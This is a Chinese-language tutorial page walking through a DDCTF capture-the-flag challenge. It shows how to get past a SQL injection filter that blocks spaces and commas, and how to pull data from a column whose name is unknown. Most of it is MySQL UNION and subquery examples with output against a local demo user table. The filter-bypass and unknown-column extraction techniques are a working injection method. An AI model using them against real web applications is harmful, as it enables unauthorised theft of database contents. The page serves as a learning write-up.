Mysql如何巧妙的繞過(guò)未知字段名詳解

更新時(shí)間：2017年05月31日 08:39:56 投稿：daisy

這篇文章主要給大家介紹了Mysql如何巧妙的繞過(guò)未知字段名的相關(guān)資料，文中給出了詳細(xì)的示例代碼供大家參考學(xué)習(xí)，對(duì)學(xué)習(xí)mysql具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面來(lái)一起看看吧。

前言

本文介紹的是DDCTF第五題，繞過(guò)未知字段名的技巧，這里拿本機(jī)來(lái)操作了下，思路很棒也很清晰，分享給大家，下面來(lái)看看詳細(xì)的介紹：

實(shí)現(xiàn)思路

題目過(guò)濾空格和逗號(hào)，空格使用%0a，%0b，%0c，%0d，%a0，或者直接使用括號(hào)都可以繞過(guò)，逗號(hào)使用join繞過(guò)；

存放flag的字段名未知，information_schema.columns也將表名的hex過(guò)濾了，即獲取不到字段名；這時(shí)可以利用聯(lián)合查詢，過(guò)程如下：

思想就是獲取flag，讓其在已知字段名下出現(xiàn)；

示例代碼：

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了，希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來(lái)一定的幫助，如果有疑問(wèn)大家可以留言交流，謝謝大家對(duì)腳本之家的支持。

您可能感興趣的文章:

相關(guān)文章

全面解析MySQL常見(jiàn)問(wèn)題的排查與解決方法
MySQL 是一款常用的關(guān)系型數(shù)據(jù)庫(kù)管理系統(tǒng),廣泛應(yīng)用于各類(lèi)應(yīng)用開(kāi)發(fā)和數(shù)據(jù)管理場(chǎng)景,然而,在實(shí)際使用中,MySQL 有時(shí)會(huì)遇到啟動(dòng)失敗、服務(wù)中斷或性能問(wèn)題等情況,所以本文給大家介紹了MySQL常見(jiàn)問(wèn)題的排查與解決方法,需要的朋友可以參考下
2024-11-11
解決ERROR?1129?(HY000):?Host?‘xxx‘?is?blocked?because?
這篇文章主要介紹了解決ERROR?1129?(HY000):?Host?‘xxx‘?is?blocked?because?of?many問(wèn)題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
2024-04-04
使用MYSQL TIMESTAMP字段進(jìn)行時(shí)間加減運(yùn)算問(wèn)題
這篇文章主要介紹了使用MYSQL TIMESTAMP字段進(jìn)行時(shí)間加減運(yùn)算問(wèn)題，具有很好的參考價(jià)值，希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方，望不吝賜教
2023-02-02
centos上安裝mysql并設(shè)置遠(yuǎn)程訪問(wèn)的操作方法
這篇文章主要介紹了centos上安裝mysql并設(shè)置遠(yuǎn)程訪問(wèn)的操作方法,需要的朋友可以參考下
2017-11-11
Mysql常見(jiàn)的驅(qū)動(dòng)程序使用
MySQL驅(qū)動(dòng)程序是連接應(yīng)用程序與MySQL數(shù)據(jù)庫(kù)的重要組件,本文主要介紹了Mysql常見(jiàn)的驅(qū)動(dòng)程序使用,文中通過(guò)示例代碼介紹的非常詳細(xì),需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
2025-03-03
基于MySQL的存儲(chǔ)引擎與日志說(shuō)明(全面講解)
下面小編就為大家分享一篇基于MySQL的存儲(chǔ)引擎與日志說(shuō)明(全面講解)，具有很好的參考價(jià)值，希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
2017-12-12
mysql查看索引的方式
這篇文章主要介紹了mysql查看索引的方式,具有很好的參考價(jià)值,希望對(duì)大家有所幫助,如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
2023-09-09
mysql字符串拼接并設(shè)置null值的實(shí)例方法
在本文中小編給大家整理的是關(guān)于mysql 字符串拼接+設(shè)置null值的實(shí)例內(nèi)容以及具體方法，需要的朋友們可以學(xué)習(xí)下。
2019-09-09
MySQL中常見(jiàn)關(guān)鍵字的用法總結(jié)
這篇文章主要為大家詳細(xì)介紹了MySQL中常見(jiàn)關(guān)鍵字的用法,例如GROUP BY、ORDER BY和LIMIT,文中的示例代碼講解詳細(xì),感興趣的小伙伴可以了解一下
2023-09-09
MySQL實(shí)現(xiàn)replace函數(shù)的幾種實(shí)用場(chǎng)景
這篇文章主要介紹了MySQL實(shí)現(xiàn)replace函數(shù)的幾種實(shí)用場(chǎng)景，文中通過(guò)示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
2021-02-02